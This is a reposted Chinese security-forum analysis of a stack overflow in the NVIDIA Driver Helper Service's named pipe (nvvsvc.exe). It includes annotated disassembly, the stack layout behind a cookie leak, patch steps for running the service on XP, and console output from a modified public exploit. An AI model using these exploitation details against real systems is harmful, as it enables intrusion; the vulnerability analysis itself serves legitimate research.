【转】NVIDIA Driver Helper Service栈溢出简单说明
最近传出NVIDIA显卡存在远程溢出漏洞,其实没有传说中那么严重,有很大的局限性。1、限于win7系统
2、远程溢出需要系统账号才行
以下转自看雪
【转】NVIDIA Driver Helper Service栈溢出简单说明
-------------------------------------------------------------------------------- -
详情见36x新闻,本来不想发出来的,不过看到36x的人又在放屁吓人.还是发出来吧.
首先这个洞和nvidia的驱动没有一毛钱关系,不是内核级的漏洞.
NVIDIA Driver Helper Service,是一个r3层的服务.
程序是nvvsvc.exe(win7)或nvvsvc32.exe(xp) -
这个程序启动后会创建一个命名管道\\pipe\nsvr,比较特别的是这个管道的dacl是空,也就是说everyone都可以访问.
然后重要的是这个洞其实只针对win7 x64版有效.在win7 x32版上只能够做到infoleak.
xp x32版下0x52命令不支持,同时老版本的xp版nvvsvc32.exe根本没建命名管道.所以也就没360x吹的那么凶,另外这个洞远程利用的情况下对于win7系统关闭了空连接共享所以必须要一个用户名密码(且密码不能为空).
下面来看洞:win7 32位版nvvsvc
loc_4035D8: ; 取后面数据的长度
lea eax,
push ebx ; ebx=2000h
push eax
mov , ecx ; ecx=3h
call sub_43132C ; 返回时如果5200后面是4000h个41h,那么eax=2000h
pop ecxSecurity. B+ E% A% p& k8 j
lea eax, ; eax=ebp+4000h-4020h=ebp-20h
pop ecxT00LS' ~) @7 ]3 u. h
mov ecx, ; =00000000h,ecx=0
add eax, 8 ; eax=lea
mov , ecx
mov ecx, ; eax=lea ,中的值为00004078h
push eax ; eax为地址,地址中的值是收到的数据中4078h后面的41 41 ..
mov , eax
lea eax,
push eax ; 的值为0
lea eax,
mov , ecx ; ecx=00004078h
push eax ; eax为地址,地址中的值为41 00 41 00....
cmp dword_491550, edi ; edi=0
jle short loc_403632
然后在下面触发
loc_40363D:
mov esi,
add esp, 0Ch
push esi ; 4078h,copy的长度
push ; 地址中的值是收到的数据中4078h后面的41 41 ..
lea eax, ; 地址中的值会发送回攻击者
push eax
call loc_430720 ; bug!!!
add esp, 0Ch
mov , esi
jmp loc_403900
最后再来看内存布局:
ebp-8044h response buffer ---目的
------------------------------recivebuf
ebp-4024h 52 00
ebp-4022h 41 41
......... 41 41
ebp-0024h 41 41
ebp-0022h 00 00
ebp-0020h 00 00 00 00
ebp-001ch 20 00 00 00
ebp-0018h 41 41 41 41
ebp-0014h 41 41 41 41
ebp-0010h 41 41 41 41
ebp-000ch 41 41 41 41
ebp-0008h 41 41 41 41
-----------------------------recivebuf
ebp-0004h cookie
漏洞原理:有漏洞的nvvsvc会读recivebuf,判断头两字节是否为52h,如果是跳过52 00后面
的字符串,然后读ebp-1c处的长度(没有任何效验),源为length的偏移往后ebp-18h,并把这些数据移到ebp-8044处的responsebuf,然后调用writefile把数据发给攻击者.如果length定义大点
就会读出ebp-4h处的stack cookie并发给攻击者.
由于32位版下局部变量的内存布局源地址在目的地址的高位,所以这个洞只能造成infoleak.
64位的情况刚好相反,所以能够利用,具体可以见老外的exp不多说.
注:
让win7 32位版的nvvsvc在xp 32位版上运行要改exe的四个地方
1www.t00ls.net4 p! r* J. O3 a6 |3 F7 s
改引入表的reggetvaluew为regclosekey,因为xp下没这个函数
程序入口getcommandlinea调用后改为jmp 00403988
3
8D 4D EC lea ecx,
51 push ecx ; lpThreadId
6A 04 push 4 ; CREATE_SUSPENDED
FF 75 F8 push ; lpParameter
89 45 EC mov , eax
68 75 34 40 00 push offset StartAddress ; lpStartAddress
50 push eax ; dwStackSize
50 push eax ; lpThreadAttributes
FF 15 98 B0 46 00 call ds:CreateThreadSecurity
89 45 F0 mov , eax
E8 F0 E8 FF FF call sub_402313 ; 这个call要注解掉
loc_403632:
lea edi,
call sub_4025D0 ; nop掉
附件说明:
nvvsvc32.rar是把win7 32位版的nvvsvc改了下让其可以在xp和win下运行不管你是否有nvidia的显卡.
exp是改的老外的攻击程序,读32位版的cookie.(ps:老外还是很牛的)
C:\Documents and Settings\mj0011\桌面\新建文件夹\ms0x-0xx\nvidia pipe>exp local ** Nvvsvc.exe Nsvr Pipe Exploit (Local/Domain) **
[ () peterwintrsmith]
- Win7 x64 DEP + ASLR + GS Bypass - Christmas 2012 -
Action 1 of 9:- CONNECT
Action 2 of 9:- CLIENT => SERVER
Written 16416 (0x4020) characters to pipe
Action 3 of 9: - SERVER => CLIENT
Read 32 (0x20) characters from pipe
Action 4 of 9: Building exploit ...
=> Stack cookie 0xb5b04abd:
Action 5 of 9:- CLIENT => SERVER*
Written 16416 (0x4020) characters to pipe
Action 6 of 9: - SERVER => CLIENT
Read 16384 (0x4000) characters from pipe
Action 7 of 9:- CLIENT => SERVER
Written 16416 (0x4020) characters to pipe
Action 8 of 9: - SERVER => CLIENT1 `/
!! Error reading from pipe (at least, no data on pipe)
这个洞有点深看不太懂 看不懂,但我还是要回帖
页:
[1]